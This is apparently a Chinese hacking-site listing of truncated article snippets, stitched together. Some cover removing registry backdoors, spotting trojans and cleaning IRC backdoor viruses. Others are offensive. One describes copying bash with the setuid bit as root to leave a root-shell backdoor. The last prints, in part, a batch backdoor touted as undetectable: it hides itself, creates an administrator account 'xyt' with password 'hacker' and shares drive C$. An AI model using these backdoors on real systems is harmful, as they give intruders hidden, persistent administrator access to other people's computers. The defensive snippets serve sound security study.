恶意网页之注册表后门—注册表使用全攻略之十九浏览器顽固不改，修改注册表成功，重新启动后又恢复到被修改的状态主要是修改注册表后留后门，目的让你修改注册表好像成功，重新启动后又恢复到被修改的状态。这主要是在启动项里留了后门，大家可以打开注册表到HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesHKCU\S...

在网络给我们的工作学习带来极大方便的同时，病毒、木马、后门以及黑客程序也严重影响着信息的安全。这些程序感染计算机的一个共同特点是在注册表中写入信息，来达到如自动运行、破坏和传播等目的。以下是笔者在网上收集的，通过修改注册表来对付病毒、木马、后门以及黑客程序，保证个人计算机的安全。1.预防AcidBatteryv1.0木马的破坏在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices下若在右边窗口中如发现了“Explorer”键值，则说明中了YAI木马，将它删除。2.预防YAI木马的...

   众所周知，Linux的文件权限如:777；666等，其实只要在相应的文件上加上UID的权限，就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方，然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了　　一个文件都有一个所有者,表示该文件是谁创建的.同时,该文件还有一个组编号,表示该文件所属的组,一般为文件所有者所属的组.　　如果是一个可执行文件,那么在执行时,一般该文件只拥有调用该文件的用户具有的权限.而setuid,setgid可以来改变这种设置.　　setuid:设置使文件在执行阶...

   你是否受到黑客攻击而愤愤不平？每当防火墙警报响起时，你是选择沉默还是给予适当的警告？该出手时就出手，借用一些技巧给对方一个善意的“下马威”吧！　　信使服务　　防火墙检测到系统受到攻击时，一般会报警或记录下相应的数据。比如常用的天网防火墙，当它检测到系统遭受攻击时，系统托盘处的天网图标就会出现一个闪烁的警报信号，双击该图标，从弹出的窗口中，你可以得到攻击者的来源、试图从端口进行“突破”等信息（如图1）。　　图1　　知道了攻击者的IP地址后，我们可以尝试使用信使服务给对方一个消息，可以是好言相劝哦！Windows2000/XP默认情况下是将信使服务开着的，可以收...

   曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象，于是人们展开了积极的防御工作，从补丁到防火墙，恨不得连网线都加个验证器，在多种多样的防御手法夹攻下，一大批后门倒下了，菜鸟们也不用提心吊胆上网了…… 可是后门会因此罢休吗？答案当然是否定的。君不见，在风平浪静的陆地下，一批新的后门正在暗渡陈仓…… 　　1、反客为主的入侵者　　黑客A连接上了网络，却不见他有任何行动，他在干什么呢？我们只能看见他燃起一支烟，似乎在发呆……过了一会儿，他突然把烟头一丢，双手迅速敲击键盘，透过屏幕，我们得知他已经进入了一个企业内部的服务器，...

   2004年年初，IRC后门病毒开始在全球网络大规模出现。一方面有潜在的泄漏本地信息的危险，另一方面病毒出现在局域网中使网络阻塞，影响正常工作，从而造成损失。 同时，由于病毒的源代码是公开的，任何人拿到源码后稍加修改就可编译生成一个全新的病毒，再加上不同的壳，造成IRC后门病毒变种大量涌现。还有一些病毒每次运行后都会进行变形，给病毒查杀带来很大困难。本文先从技术角度介绍IRC后门病毒，然后介绍其手工清除方法。 一、技术报告 IRC病毒集黑客、蠕虫、后门功能于一体，通过局域网共享目录和系统漏洞进行传播。病毒自带有简单的口令字典，用户...

代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下： @echo off @attrib +s + r xyt.bat@net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net&nb...